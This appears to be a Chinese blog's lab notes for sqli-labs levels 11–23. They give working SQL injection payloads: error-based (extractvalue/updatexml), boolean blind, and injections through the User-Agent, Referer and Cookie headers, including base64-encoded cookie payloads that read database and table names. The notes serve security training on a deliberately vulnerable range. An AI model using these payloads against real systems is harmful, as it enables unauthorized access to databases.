sqli-labs靶场笔记(四)
Less-11【报错注入|'注入】
该网站使用POST请求方式,使用Live HTTP header进行注入操作
判断username存在注入
得到username对应的密码
使用burp-repeater模块
payload 1
uname=admin’ and extractvalue(1,concat(0x7e,(select database()))) #&passwd=admin&submit=Submit
payload 2
uname=admin’ and (updatexml(‘anything’,concat(’~’,(select database())),‘anything’)) #&passwd=admin&submit=Submit
Less-12【报错注入|")注入】
使用单引号直接爆错【没有回显】,尝试使用双引号【回显报错】
使用burp
payload 1
uname=admin") and extractvalue(1,concat(0x7e,(select database()))) #&passwd=admin&submit=Submit
payload 2
uname=admin") and (updatexml(‘anything’,concat(’~’,(select database())),‘anything’)) #&passwd=admin&submit=Submit
Less-13【报错注入|’)注入】
开始先用单引号试水,报错回显
使用burp
payload 1
uname=admin’) and extractvalue(1,concat(0x7e,(select database()))) #&passwd=admin&submit=Submit
payload 2
uname=admin’) and (updatexml(‘anything’,concat(’~’,(select database())),‘anything’)) #&passwd=admin&submit=Submit
Less-14【报错注入|"注入】
单引号注入没有回显,尝试双引号【报错回显】
使用burp
payload 1
uname=admin" and extractvalue(1,concat(0x7e,(select database()))) #&passwd=admin&submit=Submit
payload 2
uname=admin" and (updatexml(‘anything’,concat(’~’,(select database())),‘anything’)) #&passwd=admin&submit=Submit
Less-15【Boolean盲注|'注入】
下面展示 payload
。
admin' order by 2 #
这里采用Boolean盲注
使用单引号、双引号试探,没有明显报错回显,不为报错注入
存在注入
该表存在2个属性列
使用burp的Repeater模块
判断数据库名长度为8
使用burp的爆破模块
得到数据库名为security
Less-16【Boolean盲注】|")注入】
下面展示一些 payload
。
admin") #
admin") order by 2 #
admin") and ascii(substr((select database()),1,1))=115 #
admin") and ascii(substr((select table_name from information_schema.columns where table_schema='security' limit 1,1),1,1))=95 #
得到数据库名security
得到数据库一个表名
Less-17【报错注入|'注入】
下面展示payload
。
admin' and (extractvalue(1,concat('~',(select database()))))#
接下来使用burp的repeater模块
Less-18【user-agent注入|报错注入|'注入|注释符屏蔽】
值得注意的是该题屏蔽了注释符:–+和#,所以改用‘a’=‘a代替
下面展示payload
。
' and (extractvalue(1,concat('~',select database()))) and 'a'='a
该题对输入框的两个地方进行了设置、过滤,故无法向其中实现注入;但是,发现查询语句从user Agent写入
Less-19【referer注入|报错注入|'注入|注释符屏蔽】
下面展示payload
。
referer:http://XXX.XXX.XXX.XXX:XXX/sqli-labs/Less-19/' and (extractvalue(1,concat('~',(select database()))))and 'a'='a
Less-20【Cookie注入|报错注入|'注入】
下面展示 payload
。
Cookie: uname=admin' and extractvalue(1,concat('~',(select database()))) #
Less-21【Cookie注入|报错注入|’)注入】
')进行base64Encode发现存在注入
下面展示 payload
。
Cookie: uname=YWRtaW4nKQ==
//这里basedecode为:admin’)
Cookie:uname=YWRtaW4nKSBhbmQgKGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgnficsKHNlbGVjdCBkYXRhYmFzZSgpKSkpKSAj
//这里base64decode为:admin') and (extractvalue(1,concat('~',(select database())))) #
Less-22【Cookie注入|报错注入|"注入】
下面展示 payload
。
Cookie: uname=YWRtaW4i
//这里basedecode为:admin"
Cookie:uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoJ34nLChzZWxlY3QgZGF0YWJhc2UoKSkpKSAj
//这里base64decode为:admin" and extractvalue(1,concat('~',(select database()))) #
Less-23【报错注入|’注入|注释符屏蔽】
下面展示 payload
。
id=1' and extractvalue(1,concat('~',(select database()))) and 'a'='a